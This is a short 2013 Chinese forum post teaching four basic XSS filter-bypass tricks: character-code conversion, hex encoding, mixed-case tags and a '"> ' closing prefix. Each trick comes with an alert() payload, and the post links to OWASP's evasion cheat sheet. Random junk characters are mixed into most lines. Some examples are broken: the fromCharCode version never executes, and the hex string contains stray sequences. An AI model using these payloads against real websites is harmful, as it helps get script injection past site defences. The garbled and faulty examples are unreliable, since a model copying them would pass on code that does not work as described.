找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2035|回复: 0
打印 上一主题 下一主题

XSS 绕过技术

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-14 00:10:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
四种超级基础的绕过方法。
( _& k3 Z! M# p8 H& x1.转换为ASCII码4 A8 Y! c: ?  \7 R( w  Y$ s0 |% _
例子:原脚本为<script>alert(‘I love F4ck’)</script >3 G; w9 a: u0 n$ N; R3 b
通过转换,变成:
8 }9 G9 n' F* ?, t7 W$ w3 u9 m<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
7 U* {$ j) Q* d  y' |* f5 X
' z. ?  Q* x+ P% K! a# C5 N! b& E2.转换为HEX(十六进制)* }7 i. v5 H7 ]4 |3 c2 }& h  U
例子:原脚本为<script>alert(‘I love F4ck’)</script>
( i2 B: [3 K5 N) ^& x" t. Q通过转换,变成:- t5 L/ b5 [8 e! e; E3 k# ?
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e! Z, i# Z$ @  y

* I% S, q2 R! l/ _* @0 b: @3.转换脚本的大小写
& ?" ^& h9 i* `- M例子:原脚本为<script>alert(‘I love F4ck’)</script>  N! u1 S) {/ K
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>; _$ `% \- H: u; M( I

1 `0 Z% q5 S& p9 ~5 v% q9 c" u4.增加闭合标记”>
; t  y$ m) C' [9 Y& o1 t# t例子:原脚本为<script>alert(‘I love F4ck’)</script>
! u- T* F- U# ^% ~0 o, l转换为:”><script>alert(‘I love F4ck’)</script>
+ h* Z( f( H, c  n  Y" d! y更详细绕过技术请参考此网页
! f8 d! b7 N9 S" d. o9 Hhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
( y. Y% ^4 @3 C: O : i: `/ u& a$ }, I! N! d
转换工具使用的是火狐的 hackbar mozilla addon.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表